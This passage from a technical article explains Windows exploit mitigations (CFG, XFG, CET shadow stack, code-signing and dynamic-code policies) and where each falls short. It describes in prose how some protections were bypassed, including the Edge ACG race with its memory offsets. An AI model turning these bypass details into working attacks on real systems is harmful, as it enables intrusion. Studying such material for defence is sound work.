// Real-world example value from a fully-instrumented MSVC 2022 binary const guardFlags = 0x0001050C; console.log('Guard Flags = 0x' + guardFlags.toString(16).padStart(8, '0')); for (const [bit, name] of FLAGS) { if (guardFlags & bit) console.log(' set: ' + name); } `}

CFG is forward-edge only. The ret instruction is invisible to it. A ROP chain that uses only return-target gadgets -- the original Shacham construction -- is not affected by CFG at all, because CFG never asks "where did this ret go?" It only asks "where did this indirect call go?" Closing the backward edge is a separate problem (section 6).

CFG is also coarse-grained. The bitmap records "is this address a valid function entry?" but not "is this address a valid function entry for this particular call site's prototype?" Any function entry in the entire process is a valid CFG target for every indirect call site. If the attacker finds a legitimate function that takes a controllable argument and does something useful, they can chain it into a working exploit without ever flipping a clear bit to set.

Those two limitations -- forward-edge only, coarse-grained -- are precisely the open questions section 5 (XFG, fine-graining) and section 6 (CET shadow stack, backward edge) answer. CFG was the first floor. The next two sections build out the rest.

5. eXtended Flow Guard (XFG): type-hash, fine-grained CFI for indirect calls

CFG knows is this a function entry? XFG asks the better question: is this the right kind of function entry?

The structural reason XFG exists has a name and a paper. May 2015, IEEE Symposium on Security and Privacy. Felix Schuster, Thomas Tendyck, Christopher Liebchen, Lucas Davi, Ahmad-Reza Sadeghi, and Thorsten Holz publish Counterfeit Object-oriented Programming: On the Difficulty of Preventing Code Reuse Attacks in C++ Applications [@coop-ieeesecurity-pdf]. The paper's abstract is constructive and brutal: COOP is "the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms" that "fully complies with previously presented coarse-grained CFI defenses."

We propose a new attack technique, called Counterfeit Object-Oriented Programming (COOP), which is the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms and which fully complies with previously presented coarse-grained CFI defenses. -- Schuster et al., IEEE S&P 2015 [@coop-ieeesecurity-pdf] A code-reuse attack technique that chains legitimate C++ virtual function calls in attacker-chosen order, achieved by corrupting vtable pointers or vtable contents. Each individual callee is a real, address-taken function entry that passes any coarse-grained CFI bitmap. The attacker assembles Turing-complete computation by chaining these legitimate calls. Published by Schuster, Tendyck, Liebchen, Davi, Sadeghi, and Holz at IEEE S&P 2015 [@coop-ieeesecurity-pdf].

The mechanism is simple to describe but hard to detect. The attacker corrupts a heap-resident C++ object's vtable pointer to point at a fake vtable they have crafted from gadget-like virtual functions of real classes in the binary. Each entry in the fake vtable points at the entry of a real virtual method. The program's own virtual dispatch sequence performs the calls. The control transfers all land at legitimate function entries. CFG, which only asks "is this a function entry?", sees nothing wrong.

Microsoft's first public disclosure of the answer came at BlueHat Shanghai in 2019. David Weston -- listed on the title slide of the deck as "Microsoft OS Security Group Manager" -- presented the design of eXtended Flow Guard (XFG) [@weston-bhshanghai-2019]. Microsoft never published a written XFG specification; the canonical public deconstruction is Connor McGarr's August 2020 reverse-engineering, which remains the best public account of how the mechanism actually works [@mcgarr-xfg].

The mechanism is elegant. At compile time, MSVC computes a 64-bit type hash for every function: a truncated SHA-256 (first 8 bytes of the 32-byte digest) of the parameter count, parameter types, variadic flag, calling convention, and return type. The compiler stores this hash 8 bytes before each CFG-valid function entry [@mcgarr-xfg]. At each indirect call site, the compiler knows the expected prototype (from the call's static type), emits the same hash inline, and the dispatch thunk reads the 8 bytes preceding the target and compares.

flowchart TD A[Indirect call site] --> B{"CFG bitmap
bit set?"} B -->|No| F1[__fastfail] B -->|Yes| C{"XFG enabled?"} C -->|No| D[Proceed
CFG only] C -->|Yes| E[Read hash
at target - 8] E --> G{"Hash matches
expected prototype?"} G -->|No| F2[__fastfail
same status] G -->|Yes| H[Proceed
full XFG]

A COOP attacker who replaces a vtable pointer with the address of a different real virtual function passes CFG: the new target is a valid function entry. They fail XFG: the 8 bytes preceding the new target encode a different prototype hash than the call site expects. The fix moves the granularity from "every function entry" to "every function entry compatible with this exact prototype" -- orders of magnitude closer to perfect forward-edge CFI.

XFG shipped in Windows 10 21H1 internals. The /guard:xfg MSVC flag was added. The XFG dispatch thunks (__guard_xfg_dispatch_icall_fptr) appeared in ntdll.dll. Then it didn't enable by default.Connor McGarr's Black Hat USA 2025 deck, Out of Control: How KCFG and KCET Redefine Control Flow Integrity in the Windows Kernel, states verbatim: "XFG was never fully instrumented (UM/KM) and is now deprecated." McGarr is listed on the title slide as Software Engineer, Prelude Security [@mcgarr-bhusa25].

Two reasons XFG didn't ship enforcement-by-default. First, compatibility cost: XFG breaks any C-style cast through a different prototype. Windows is full of these, including in third-party drivers and inbox-COM components, and every breakage costs a customer ticket. Second, hardware overtook software. CET shadow stack arrived on Tiger Lake in September 2020 (section 6) and gave the entire backward edge for free, leaving the forward-edge problem partially un-fine-grained but the *complete* CFI surface achievable by composing CFG (forward, coarse) with CET (backward, perfect). The math worked out: ship CET strictly, and a coarse-grained forward edge is good enough -- because the backward edge, the bigger half of the call graph, is now perfect.

XFG remains the most interesting almost-shipped Windows mitigation. The instrumentation is in MSVC. The dispatch thunks are in ntdll. Enforcement-by-default never arrived, and the McGarr 2025 deck names it as deprecated. The strategic pivot to hardware is what Microsoft made instead.

What does that hardware look like, and what edge does it protect? Tiger Lake shipped in September 2020. For the first time since Shacham 2007, the kind of ROP that chains ret-terminated gadgets could be killed by the CPU itself.

6. Hardware-enforced Stack Protection (Intel CET shadow stack)

The Microsoft Tech Community post that introduced CET shadow stack on Windows -- preserved on the Wayback Machine because the live URL is a JavaScript-rendered shell -- gives the framing in one sentence:

We shipped Control Flow Guard (CFG) in Windows 10 to enforce integrity on indirect calls (forward-edge CFI). Hardware-enforced Stack Protection will enforce integrity on return addresses on the stack (backward-edge CFI), via Shadow Stacks. -- Microsoft Tech Community, *Understanding Hardware-enforced Stack Protection* [@cet-techcommunity-wayback] A second, per-thread stack maintained by the CPU in parallel with the regular call stack. Every `call` instruction pushes the return address to both stacks. Every `ret` pops both and compares. A mismatch raises a `#CP` (Control Protection) fault, which Windows surfaces as `STATUS_STACK_BUFFER_OVERRUN`. The shadow stack page is hardware-protected: only the new instructions `INCSSP`, `RDSSP`, `WRSS`, and the call/ret/IRET microcode can write to it. User-mode stores into a shadow-stack page fault.

The mechanism, drawn from Intel's CET specification and Microsoft's Windows enabling documents [@cet-techcommunity-wayback, @wiki-intel-cet, @ms-cetcompat]:

Every call instruction now writes the return address twice -- once to the regular stack, and once to the per-thread shadow stack at [SSP].
The shadow-stack page is marked with a new MMU bit that makes it readable but not writable by general store instructions. Only the new instructions INCSSP, RDSSP, WRSS, WRUSS, and the call/ret/IRET microcode can store to it.
Every ret pops the regular stack and pops the shadow stack and compares. Equal: proceed. Different: raise #CP. On Windows, #CP is routed through the KiRaiseException path as STATUS_STACK_BUFFER_OVERRUN.
New instructions exist for legitimate unwinding. INCSSP imm advances the SSP across unwound frames -- the C++ longjmp and the Windows SEH unwinder both use this. RDSSP reads the current SSP into a register.
The /CETCOMPAT MSVC linker flag, available from Visual Studio 2019 onward, marks an x64 image as shadow-stack-compatible by setting the IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT bit in the extended DLL characteristics word [@ms-cetcompat].

Tiger Lake shipped CET first, in September 2020. AMD followed with the same architectural spec in Zen 3 in November 2020 [@wiki-intel-cet]. The two vendors implement the same instructions, the same MMU bit, the same fault. The shadow-stack image format is identical. Windows uses the same code paths on both.AMD Zen 3 was launched on November 5, 2020, two months after Tiger Lake [@wiki-intel-cet]. Both vendors implement the Intel CET specification verbatim, so Microsoft's Windows enabling code is single-source.

sequenceDiagram participant CPU participant RStack as Regular stack participant SStack as Shadow stack Note over CPU,SStack: function prologue CPU->>RStack: push retaddr_A CPU->>SStack: push retaddr_A (shadow) Note over CPU,SStack: attacker corrupts retaddr_A on regular stack to retaddr_X Note over CPU,SStack: function epilogue CPU->>RStack: pop -> retaddr_X CPU->>SStack: pop -> retaddr_A CPU->>CPU: compare retaddr_X vs retaddr_A CPU->>CPU: mismatch CP fault then STATUS_STACK_BUFFER_OVERRUN

The Windows policy surface for CET is ProcessUserShadowStackPolicy, structured exactly like every other policy in the enum -- a DWORD of bitfields and a "reserved" tail [@ms-user-shadow-stack-policy]. Ten flags are documented:

EnableUserShadowStack -- turn it on (compatibility mode: only shadow-stack violations in CETCOMPAT-marked modules are fatal)
AuditUserShadowStack -- log without enforcing
SetContextIpValidation -- block SetThreadContext (and the equivalent NtSetContextThread from a peer process) from setting an instruction pointer to an unguarded address
AuditSetContextIpValidation -- log version
EnableUserShadowStackStrictMode -- upgrade from compatibility mode (only CETCOMPAT-module shadow-stack violations are fatal) to strict mode (all shadow-stack violations are fatal, even in non-CETCOMPAT modules)
BlockNonCetBinaries -- the loader refuses to map non-/CETCOMPAT DLLs into the process; strict policy for the most-hardened sandboxes
BlockNonCetBinariesNonEhcont -- like BlockNonCetBinaries, but also requires images to carry /guard:ehcont exception-handling continuation metadata
AuditBlockNonCetBinaries -- log version of BlockNonCetBinaries
SetContextIpValidationRelaxedMode -- permits some legacy patterns
CetDynamicApisOutOfProcOnly -- requires SetProcessValidCallTargets-style operations to come from a peer process

The SetContextIpValidation flag is worth a separate paragraph. The original CET shadow-stack design protected against attackers who corrupted return addresses on the regular stack. A more subtle attack used SetThreadContext from a peer process (or, equivalently, the in-process NtSetContextThread) to write a register-state structure containing an attacker-chosen RIP. The thread, when resumed, would jump to that RIP -- with no ret instruction involved, so the shadow stack saw nothing. SetContextIpValidation closes that hole by validating the requested RIP against the bitmap before the kernel resumes the thread. Without it, CET shadow stack has a documented bypass [@ms-user-shadow-stack-policy].

A new CPU exception introduced with Intel CET. Raised when a shadow-stack compare fails on `ret`, when an `endbranch` instruction is missing at an indirect-branch target (for IBT-style CET, separate from shadow stack), or when an attempt is made to write to a shadow-stack page from a non-shadow-stack instruction. Windows routes `#CP` through `STATUS_STACK_BUFFER_OVERRUN`, the same status used for stack-canary violations and CFG failures.

Compose CFG with CET shadow stack and you have the result the entire arc since Aleph One has been pointing at:

Key idea: CFG (forward edge) plus CET shadow stack (backward edge) equals full Control-Flow Integrity on x86-64, from compiler plus hardware. This is the cleanest moment in the article: two mitigations, from two different layers, compose into a property that took twenty years to assemble.

Full CFI is not the same as full security. CET still does not cover three structural attack classes. Call-oriented programming and jump-oriented programming chain gadgets ending in call or jmp rather than ret; the call/return invariant is preserved, so CET sees nothing. COOP chains entire legitimate virtual functions with matching call/return pairs; CET sees nothing. Data-oriented attacks (section 13) never violate any control-flow invariant at all, because they never hijack control flow in the first place.

We have constrained the control flow. We have not constrained which code is in the process. An attacker can still load a malicious-but-signed-looking DLL through the loader, or persuade a JIT to emit attacker-chosen bytes into the JIT heap and then redirect a legitimate call to that JIT-allocated address. That is the code layer, not the control flow layer. The parallel mitigation path -- CIG and ACG -- is what closes it.

7. Code Integrity Guard (CIG): only signed images can load

Even if the attacker can't generate code and can't redirect control flow, they can still ask the loader to do it for them. Plant a Microsoft-signed DLL somewhere the loader will pick it up; LoadLibrary runs the planted DLL's DllMain; you have remote code execution through a trusted entry point. The structural answer is to restrict the universe of DLLs the loader will ever map into a hardened process.

That is the function of Code Integrity Guard. CIG first appeared in Microsoft Edge in Windows 10 1511 (November 2015) [@miller-acg-blog]. The canonical primary on its design is Matt Miller's February 2017 Edge blog Mitigating arbitrary native code execution in Microsoft Edge [@miller-acg-blog]. The corresponding policy in SetProcessMitigationPolicy is ProcessSignaturePolicy, with the bitfield PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY [@ms-binary-signature-policy].

A per-process policy that restricts the set of binaries the loader will map into the process to images signed by an allowed code-signing root. Implemented in Windows via the `ProcessSignaturePolicy` mitigation policy. The most common configuration is `MicrosoftSignedOnly`, which restricts loads to Microsoft-rooted catalogue chains. Bypass attempts that load a malicious DLL into the process return `STATUS_INVALID_IMAGE_HASH` from `LoadLibrary` / `LoadLibraryEx` / `NtMapViewOfSection` [@miller-acg-blog, @ms-binary-signature-policy].

The policy structure carries three levels:

MicrosoftSignedOnly -- only images chaining to a Microsoft root will load
StoreSignedOnly -- only Microsoft Store-signed images
MitigationOptIn -- the loader accepts any image signed by Microsoft, the Windows Store, or the Windows Hardware Quality Labs (WHQL); the broadest of the three signing-level settings

Plus an AuditMicrosoftSignedOnly audit-only flag that logs without blocking, for compatibility testing in the run-up to enforcement.

The kernel subsystem that enforces image-signing policy on user-mode binary loads. UMCI is the user-mode counterpart of KMCI (Kernel-Mode Code Integrity, used by Windows Driver Signature Enforcement and HVCI). CIG calls into UMCI on every `NtMapViewOfSection` to verify that the section's backing image is signed by an allowed root before the loader maps it.

The mechanism is small. Every LoadLibrary, every LoadLibraryEx, and every NtMapViewOfSection consults UMCI (User-Mode Code Integrity). If the image is not signed by a Microsoft-rooted catalogue chain when MicrosoftSignedOnly is in effect, the load returns STATUS_INVALID_IMAGE_HASH [@miller-acg-blog, @ms-binary-signature-policy]. The process keeps running; the DLL just doesn't load. (Most attack chains aren't structured to handle that gracefully, so in practice the process crashes shortly afterward when it tries to dereference a function pointer the failed DLL was supposed to provide.)

CIG is a publisher check, not a content check. A Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, or the CVE-2013-3900 Authenticode-padding family that allows a signed binary to carry attacker-controlled trailing data without invalidating the signature -- still loads normally. CIG can't tell. App Control (formerly Windows Defender Application Control) and the Microsoft Driver Block List are the partial answer: a curated list of banned-but-signed binaries UMCI consults and rejects even when their signatures verify.

CVE-2013-3900 was disclosed in December 2013. Microsoft shipped an opt-in registry fix (EnableCertPaddingCheck) and left the strict default off for over a decade for compatibility reasons; in July 2024 the company republished the CVE in the Security Update Guide to formally reaffirm that the strict-Authenticode behaviour remains available as an opt-in across all currently supported releases of Windows 10 and Windows 11 ("Microsoft does not plan to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows") [@nvd-cve-2013-3900]. The structural-vulnerable-but-signed class has been operationally hard to retire for the same reason every backwards-compatibility constraint is hard to retire.

Note: ProcessSignaturePolicy is applied to subsequent loader operations after the policy is installed. DLLs that were already mapped into the process before the call to SetProcessMitigationPolicy are not unloaded retroactively. This is the structural reason serious sandboxed processes (Edge content, Chrome renderer) use UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY) at CreateProcess time -- the kernel installs the policy before the child's first user-mode instruction runs, so even the loader's initial sweep of static imports is policed.

The Microsoft-signed DLL universe is large. Many of those binaries have controllable side effects: search-order hijacks, Authenticode-padding writes, signed-driver privilege primitives, signed-tooling code-injection helpers. CIG does not look at side effects; it only looks at the signature. The residual class that survives `MicrosoftSignedOnly` -- "signed but vulnerable" -- is precisely the class App Control's reactive blocklist tries to keep up with. As of the 2025 Driver Block List there are hundreds of blocked-but-signed binaries; the list grows every quarter. This is one of the unsolved problems the article closes with in section 14.

CIG and ACG are siblings but not synonyms. CIG prohibits loading unsigned images. ACG prohibits generating new executable code at runtime. They attack different attack surfaces. The signed-DLL-injection bypass that defeats CIG does not defeat ACG, because the planted DLL is not generating new code -- it is using its (signed but vulnerable) existing code. The JIT-spray-as-CFG-bypass that defeats ACG does not defeat CIG, because the JIT was not loading a new DLL. An attacker who solves one still has to solve the other.

What does the generation half look like?

8. Arbitrary Code Guard (ACG): W^X for the entire process

March 2017. Windows 10 Creators Update ships. Microsoft Edge enables a single flag in the new ProcessDynamicCodePolicy structure. Every JavaScript JIT engine in the world has to be rearchitected.

A per-process policy that prevents *any* code that did not originate as a signed image at startup from becoming executable. With ACG enabled, calls to `VirtualAlloc` with `PAGE_EXECUTE_*` return `STATUS_DYNAMIC_CODE_BLOCKED`. Calls to `VirtualProtect` that attempt to *add* execute permission to an existing page return the same status. `MapViewOfSection` with `SECTION_MAP_EXECUTE` requires the section's backing image to be signed. The net effect: every executable byte in the process originated as a Microsoft-signed PE mapped by the loader at startup, and nothing else can ever become runnable in this process's address space [@miller-acg-blog, @ms-dynamic-code-policy].

The PROCESS_MITIGATION_DYNAMIC_CODE_POLICY structure carries four flags [@ms-dynamic-code-policy]:

ProhibitDynamicCode -- the core enforcement flag
AllowThreadOptOut -- a thread can call SetThreadInformation(ThreadDynamicCodePolicy, 0) to escape, which Microsoft's documentation warns against using with ProhibitDynamicCode because the two flags together leak the policy's intent
AllowRemoteDowngrade -- a higher-privileged peer can disable the policy via SetProcessMitigationPolicy
AuditProhibitDynamicCode -- log without enforcing

The structural rule, restated mechanically [@miller-acg-blog, @ms-dynamic-code-policy]:

VirtualAlloc with PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, or PAGE_EXECUTE_WRITECOPY: blocked.
VirtualProtect that adds any executable permission to an existing page: blocked.
MapViewOfSection with SECTION_MAP_EXECUTE for a section not backed by a signed image: blocked.
The only way new executable pages enter the process: the loader maps signed PEs at module load time, and (with CIG also on) only Microsoft-signed PEs.

The browser-JIT architectural consequence is the most-cited single change in the entire Windows mitigation literature. Pre-2017, every JavaScript JIT generated native code at runtime into a RWX-permission heap inside its own browser process. The pattern was simple: allocate a page, write machine code into it, mark it executable, jump. ACG turned that pattern into a fatal error.

Chakra (then Edge's engine), V8 (Chrome's engine, when Edge later switched to Chromium), SpiderMonkey (Firefox), and JavaScriptCore (Safari) all responded by moving the JIT compilation step out of the renderer process [@miller-acg-blog]. The architecture became: the renderer ships JavaScript source over an authenticated IPC channel to a JIT process; the JIT process compiles to machine code; the JIT process owns a signed section backing the compiled output; the renderer maps that signed section read-execute via MapViewOfFile and dispatches into it. The renderer is locked into ACG. The JIT process is not (it has to write code), but it never parses untrusted content -- only pre-validated bytecode from the renderer over a typed IPC schema.

flowchart LR subgraph Pre["Pre-ACG (before March 2017)"] direction TB R1[Renderer process] R1 --> J1[In-process JIT] J1 --> H1["RWX JIT heap
(W^X violation)"] H1 --> E1[Execute jitted
JS] end subgraph Post["Post-ACG (Edge 1703 and later)"] direction TB R2[Renderer
ACG on] R2 -->|IPC bytecode| J2[JIT process
ACG off] J2 -->|signed
section| S2[Shared mapping] R2 -->|MapViewOfFile
R-X| S2 S2 --> E2[Execute jitted
JS in renderer] end

That rearchitecture is the structural cost ACG imposed. It is not small. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip, which matters for short-lived JavaScript (lots of small functions, one-shot pages). It also creates a new trust boundary -- between renderer and JIT process -- which is itself an attack surface, and which the next paragraph names.

The bypass tradition starts almost immediately. Reported December 2017, publicly disclosed February 2018, Project Zero issue 42450607. James Forshaw and Ivan Fratric document the race-the-mitigation-window class [@p0-issue-42450607, @exploit-db-44467]. The PoC is small enough to read in one paragraph.

Each Edge content process (`MicrosoftEdgeCP.exe`) called `SetProcessMitigationPolicy(ProcessDynamicCodePolicy, ...)` on itself shortly after startup. The advisory documents the verbatim callstack: `MicrosoftEdgeCP!SetProcessDynamicCodePolicy+0xc0`. Forshaw and Fratric discovered that there is a window between `CreateProcess` returning the new content process's handle and that child's first call into `SetProcessDynamicCodePolicy`. During that window, a peer content process in the same AppContainer can `OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION)` the new child and `WriteProcessMemory` two specific bytes -- at Edge offsets `0x23090` and `0x23092` on the version Forshaw and Fratric tested, build "up-to-date on Windows 10 version 1709" [@p0-issue-42450607]. The two bytes are global flags that, if set, cause `SetProcessDynamicCodePolicy` to short-circuit and return success without installing the policy. The result: a child renderer that *thinks* ACG is on, that the parent thinks has ACG on, but in which `VirtualAlloc(PAGE_EXECUTE_READWRITE)` succeeds normally. Microsoft's fix was structural: migrate to `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)`, so the policy is installed *by the kernel* before the child's first user-mode instruction runs and the race window closes.

The second-generation bypass came faster than anyone expected. May 2018, Ivan Fratric publishes Bypassing Mitigations by Attacking the JIT Server on the Project Zero blog [@p0-fratric-jit-2018]. Once ACG forced JIT out of process, the new attack surface was the IPC channel and the JIT-server allocation address. Fratric writes: "we believe that any other attempt to implement out-of-process JIT would encounter similar problems." That sentence is the deeper lesson of the entire mitigation tradition: a new trust boundary -- between renderer and JIT process, between user and kernel, between content process and broker -- is a new attack class. You did not eliminate the attack surface; you moved it.

ACG plus CIG, then, closes "what code can run in this process": no unsigned image loads (CIG), no dynamic code generation (ACG), no executable allocations of any kind that did not originate as a signed PE on disk. That is a closed surface for the code dimension. But the attacker has more options than memory and signatures. There is the kernel surface beneath the renderer's syscalls. There is the legacy extension-point loader. There are fonts, image loads, side channels. Those are the smaller, operationally-critical mitigations -- the rest of the twenty.

9. The smaller, operationally critical mitigations

DEP, ASLR, CFG, CET, CIG, ACG -- that is the canonical six. But the PROCESS_MITIGATION_POLICY enum lists twenty-one values [@ms-process-mitigation-enum]. The other fourteen actual policies are not afterthoughts. Each one is a tombstone for a specific attack class that did not fit into "don't let the attacker write code" or "don't let the attacker pick the call target."

`ProcessSystemCallDisablePolicy` -- Disable Win32k System Calls

Edge content process, 2017 onward. The Win32k.sys driver implements the GUI subsystem and was, for many years, the single largest contributor to Windows kernel CVEs. A renderer process that does not draw windows can refuse Win32k syscalls entirely, eliminating an enormous swath of kernel attack surface for a compromised renderer. The Edge content process is the canonical user. The Edge sandbox blog documents the AC architecture and capability model the renderer runs inside [@edge-sandbox-blog]; the policy enum entry itself is in ms-setprocessmitigationpolicy [@ms-setprocessmitigationpolicy]. Connor McGarr's 2025 deck addresses the Win32k surface explicitly: "Call targets in Win32k can be corrupted with a valid NT call target" -- which is the structural reason the policy exists [@mcgarr-bhusa25].

`ProcessExtensionPointDisablePolicy`

Disables legacy extension-point classes that have historically been DLL-injection vectors: AppInit_DLLs (registry-driven inject-into-everything), IME modules, Layered Service Providers (LSP, the Winsock provider chain), WinEventHook/SetWindowsHookEx global hooks. Enabling the policy makes the loader refuse to map any DLL through these legacy paths into the process [@ms-setprocessmitigationpolicy, @ms-process-mitigation-enum]. This is one of the lowest-cost mitigations to enable for any process that does not knowingly need legacy IME or LSP integration.

`ProcessFontDisablePolicy`

Refuses non-system fonts. The historical motivation was a 2015 wave of ATMFD.DLL kernel-font-parser CVEs (the Adobe Type Manager font driver). Microsoft moved the font parser out of the kernel into user mode after that wave, and this per-process policy then refuses non-system fonts entirely for browser-class sandboxed processes that do not need them [@ms-setprocessmitigationpolicy].

`ProcessImageLoadPolicy`

Three loader-time flags, all about where a DLL can come from:

NoRemoteImages -- block DLLs whose path is a UNC \\server\share\dll. Eliminates a remote-DLL family that crossed administrative boundaries.
NoLowMandatoryLabelImages -- block DLLs whose file was written by a low-integrity-label process. A compromised sandboxed process could write a DLL to disk; this flag stops a peer broker from picking that DLL up.
PreferSystem32Images -- search \Windows\System32\ before the application directory in the DLL search order. Closes the DLL-search-order-hijack class, a very old attack surface.

All three are in [@ms-image-load-policy]. Together they collapse the DLL-loading attack surface to a small, well-controlled set of code paths.

`ProcessStrictHandleCheckPolicy`

Causes the process to fault immediately on any use of an invalid handle (use-after-close, double-close, opaque-mismatch) [@ms-setprocessmitigationpolicy]. Handle bugs are an obscure but exploitable class -- a freed kernel object's handle can be reissued, and a process that does not detect this can be tricked into operating on an attacker-controlled replacement. Strict handle checking turns a subtle handle-confusion bug into an immediate crash, before the attacker can pivot.

`ProcessRedirectionTrustPolicy` -- RedirectionGuard

Mitigates symbolic-link, junction, and mount-point confused-deputy attacks. James Forshaw documented the attack family at Project Zero starting in August 2015 with the Windows 10 symbolic-link mitigations post [@p0-forshaw-symlink-2015]. Microsoft shipped the per-process mitigation a decade later, in June 2025 [@msrc-redirectionguard]. RedirectionGuard refuses to traverse a junction if the junction's target was created by a less-trusted user than the process performing the open -- closing the "a low-IL caller plants a junction; a high-IL service follows it" pattern that has been a steady source of local privilege escalation since at least Windows Vista.RedirectionGuard's June 2025 ship date makes it the freshest entry in the PROCESS_MITIGATION_POLICY enum. The MSRC blog states the structural framing in one sentence: "Junctions remain the biggest existing gap. Outside of a sandbox, they can be created by standard users and target any folder on the system" [@msrc-redirectionguard].

`ProcessSideChannelIsolationPolicy`

Two distinct sub-mitigations [@ms-setprocessmitigationpolicy]:

IsolateSecurityDomain -- on context switch, issue IBPB (Indirect Branch Predictor Barrier) and STIBP (Single Thread Indirect Branch Prediction) flushes. This is the per-process Spectre v2 / MDS side-channel mitigation. Performance cost is real, in the 2-5% range on indirect-branch-heavy workloads, and is the reason this policy is opt-in rather than default.
DisablePageCombining -- prevents the kernel from merging identical physical pages across processes. Page-combining is a memory-saving feature that creates a cross-process side-channel: timing the cost of a write to a shared, copy-on-write page leaks whether the page was previously merged with another process's identical page.

`ProcessUserShadowStackPolicy`

The CET-on switch from section 6 [@ms-user-shadow-stack-policy]. Listed here for enum completeness.

`ProcessChildProcessPolicy`

Refuses any CreateProcess call originating from the process [@ms-setprocessmitigationpolicy]. Edge content processes and Chromium renderers enable this. The structural attack class it closes is "renderer is compromised; renderer spawns cmd.exe or powershell.exe and the attacker pivots to a non-sandboxed cousin." With ProcessChildProcessPolicy on, the renderer cannot spawn anything; the attacker has to either bypass within the sandbox or attack the broker process.

`ProcessPayloadRestrictionPolicy` -- EAF / IAF / ROP checks

The mitigations that EMET originally bundled, carried forward into Windows Defender Exploit Guard [@ms-defender-exploit-protection]: Export Address Filter (EAF), Import Address Filter (IAF), ROP-Stack-Pivot, ROP-Caller-Check, ROP-Sim-Exec. Five sub-mitigations that detect heuristic exploit patterns. The honest assessment: these are defense-in-depth against legacy 32-bit binaries that cannot be recompiled with CFG, XFG, or CET. On modern x64 binaries built with /guard:cf /CETCOMPAT, the payload-restriction checks are largely redundant. They remain useful as a backstop for unrecompilable third-party code that runs in a hardened parent process.

`ProcessASLRPolicy` and `ProcessDEPPolicy`

The per-process knobs on top of the system-wide foundations [@ms-setprocessmitigationpolicy]. ProcessASLRPolicy exposes BottomUpRandomization, HighEntropy, ForceRelocateImages, and other refinements -- useful for forcing a paranoid configuration on processes that load third-party DLLs without /DYNAMICBASE. ProcessDEPPolicy is a 32-bit-only vestigial knob; on x64 it does nothing because DEP is unconditionally on.

The other policies

ProcessActivationContextTrustPolicy (restricts manifest-driven activation contexts), ProcessMitigationOptionsMask (a meta-policy returning the mask of supported bits), ProcessSystemCallFilterPolicy (per-process syscall allowlist; rare in production), ProcessUserPointerAuthPolicy (the ARM64-Windows switch for ARM Pointer Authentication, comparatively discussed in section 11), and ProcessSEHOPPolicy (the per-process Structured Exception Handling Overwrite Protection knob -- a Vista-era mitigation predating the modern enum) fill out the enum to twenty-one values. None are individually load-bearing for the article's narrative; they exist for completeness of the kernel ABI.

Twenty policies plus a sentinel. The canonical six handle the control-flow primitives. The other fourteen handle adjacent surfaces. What does it look like when all of these are turned on at once, and which binaries actually do that?

10. What does a maximally hardened modern Windows process look like?

It is one thing to enumerate policies. It is another to ask: who actually turns them on? Where does Microsoft itself enable each one, and what is the structural reason it cannot be enabled on the others?

The fastest way to answer that question is a single matrix. Each column is a binary; each row is a PROCESS_MITIGATION_POLICY value. Each cell is either enabled, or the structural reason it cannot be. The matrix below summarizes the typical Get-ProcessMitigation output for representative binaries, with structural-can't reasons drawn from public Microsoft documentation, Matt Miller's Edge mitigation blog [@miller-acg-blog], and the policy-enum reference [@ms-process-mitigation-enum, @ms-setprocessmitigationpolicy].

Policy	Edge content (`MicrosoftEdgeCP.exe`)	Chrome renderer	Outlook (Office)	Defender (`MsMpEng.exe`)	Recall (Windows AI service)	`Notepad.exe`
DEP / ASLR (system foundation)	yes	yes	yes	yes	yes	yes
CFG	yes	yes	yes	yes	yes	yes
CET shadow stack	yes (strict)	yes	partial	yes	yes (strict)	yes (default)
ACG (`ProcessDynamicCodePolicy`)	yes	yes (with OOP JIT)	no -- COM/MAPI add-ins	no -- engine generates scanner code at runtime	yes	n/a (no JIT)
CIG (`ProcessSignaturePolicy`)	yes (`MicrosoftSignedOnly`)	partial -- plugins	no -- third-party add-ins	yes	yes (`MicrosoftSignedOnly`)	n/a
Disable-Win32k (`SystemCallDisable`)	yes	yes (renderer process)	n/a (GUI)	yes (no GUI)	yes (no GUI)	n/a (GUI)
Disable-Extension-Points	yes	yes	partial	yes	yes	default
Image-Load (all three flags)	yes	yes	partial	yes	yes	default
StrictHandleCheck	yes	yes	yes	yes	yes	yes
ChildProcess	yes	yes	no -- launches `winword`, etc.	yes (no children)	yes (no children)	no
FontDisable	yes	yes	n/a (renders fonts)	n/a	n/a	n/a
RedirectionGuard	yes (since 2025)	yes (since 2025)	partial	yes	yes	partial
SideChannelIsolation	optional	optional	optional	optional	yes (high-trust)	optional
PayloadRestriction (EAF/IAF/ROP)	yes	yes	yes	yes	yes	n/a

The pattern that emerges from this matrix is the article's most important practical observation. The matrix is a threat-model artefact.

For any sandboxed-parser design -- a renderer, a font rasterizer, a PDF previewer, an image decoder -- the structurally-correct policy set is the union of what Edge and Recall enable. Both binaries parse untrusted content from the internet or from local files; both run in isolation; neither needs to load third-party signed DLLs, draw windows, or launch child processes. They can enable the full canonical recipe.

For any extensibility-by-design surface, the policy set is smaller and the threat model has to absorb the gap. Outlook cannot enable CIG because the MAPI plugin model and third-party COM add-ins are an existential product feature. Outlook cannot enable ChildProcess because it launches Word to open attachments. Defender cannot enable ACG because the scanner engine generates emulator bytecode, signature-compilation routines, and regex JITs at runtime -- it is, by design, a JIT for AV signatures, and that JIT runs in MsMpEng.exe. Chromium cannot enable CIG by default because of the third-party plugin model (Widevine, native messaging hosts, accessibility integrations).

Key idea: The canonical 2026 hardened-process recipe is CFG plus CET shadow stack plus ACG plus CIG plus Disable-Win32k plus Disable-Extension-Points plus Image-Load (all three flags) plus StrictHandleCheck plus ChildProcess plus, for parsers, FontDisable, plus RedirectionGuard for filesystem-interacting binaries. Every binary that misses one of these does so for a documentable structural reason -- which is exactly the threat-model artefact the matrix above produces.

This is the recipe the VBS and Trustlets sibling article in this series calls "user-mode hardened." The VBS-isolated Trustlets in the Secure Kernel layer have a separate, complementary surface; see that article for the kernel-side parallel.
